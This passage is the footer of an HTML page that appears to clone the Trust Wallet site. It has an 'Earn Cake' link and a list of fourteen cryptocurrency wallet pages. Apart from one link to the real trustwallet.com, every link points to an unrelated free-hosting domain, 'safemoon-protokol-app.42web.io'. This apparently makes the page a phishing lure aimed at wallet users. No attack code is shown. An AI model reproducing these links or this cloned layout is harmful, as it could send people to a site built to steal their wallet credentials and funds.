<a href="https://safemoon-protokol-app.42web.io/?earn-cake" class="text-reset" aria-label="opens a cake page where you can learn how to earn it">Earn Cake</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 col-lg-2">
<h4 class="font-weight-bold text-uppercase text-gray-700">Assets</h4>
<ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
<li class="mb-3"><a href="https://trustwallet.com/bitcoin-wallet" class="text-gray-700" aria-label="Goes to the page of  (BTC) where you can learn more about it">Bitcoin (BTC)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?ethereum-wallet" class="text-gray-700" aria-label="Goes to the page of  (ETH) where you can learn more about it">Ethereum (ETH)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?binance-coin-wallet" class="text-gray-700" aria-label="Goes to the page of  (BNB) where you can learn more about it">Binance Coin (BNB)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?litecoin-wallet" class="text-gray-700" aria-label="Goes to the page of  (LTC) where you can learn more about it">Litecoin (LTC)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?xrp-wallet" class="text-gray-700" aria-label="Goes to the page of  (XRP) where you can learn more about it">Ripple (XRP)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?dogecoin-wallet" class="text-gray-700" aria-label="Goes to the page of  (DOGE) where you can learn more about it">Dogecoin (DOGE)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?polkadot-wallet" class="text-gray-700" aria-label="Goes to the page of  (DOT) where you can learn more about it">Polkadot (DOT)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?smart-chain-wallet" class="text-gray-700" aria-label="Goes to the page of  (BNB) where you can learn more about it">Smartchain (BNB)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?dash-wallet" class="text-gray-700" aria-label="Goes to the page of  (DASH) where you can learn more about it">Dash (DASH)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?tron-wallet" class="text-gray-700" aria-label="Goes to the page of  (TRX) where you can learn more about it">TRON (TRX)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?tezos-wallet" class="text-gray-700" aria-label="Goes to the page of  (XTZ) where you can learn more about it">Tezos (XTZ)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?cosmos-wallet" class="text-gray-700" aria-label="Goes to the page of  (ATOM) where you can learn more about it">Cosmos (ATOM)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?stellar-wallet" class="text-gray-700" aria-label="Goes to the page of  (XLM) where you can learn more about it">Stellar (XLM)</a>
</li><li class="mb-3"><a href="https://safemoon-protokol-app.42web.io/?kava-wallet" class="text-gray-700" aria-label="Goes to the page of  (KAVA) where you can learn more about it">Kava (KAVA)</a>
</li></ul>
</div>
</div>
</div>
</footer>

<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T583ZCC" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>



</body></html>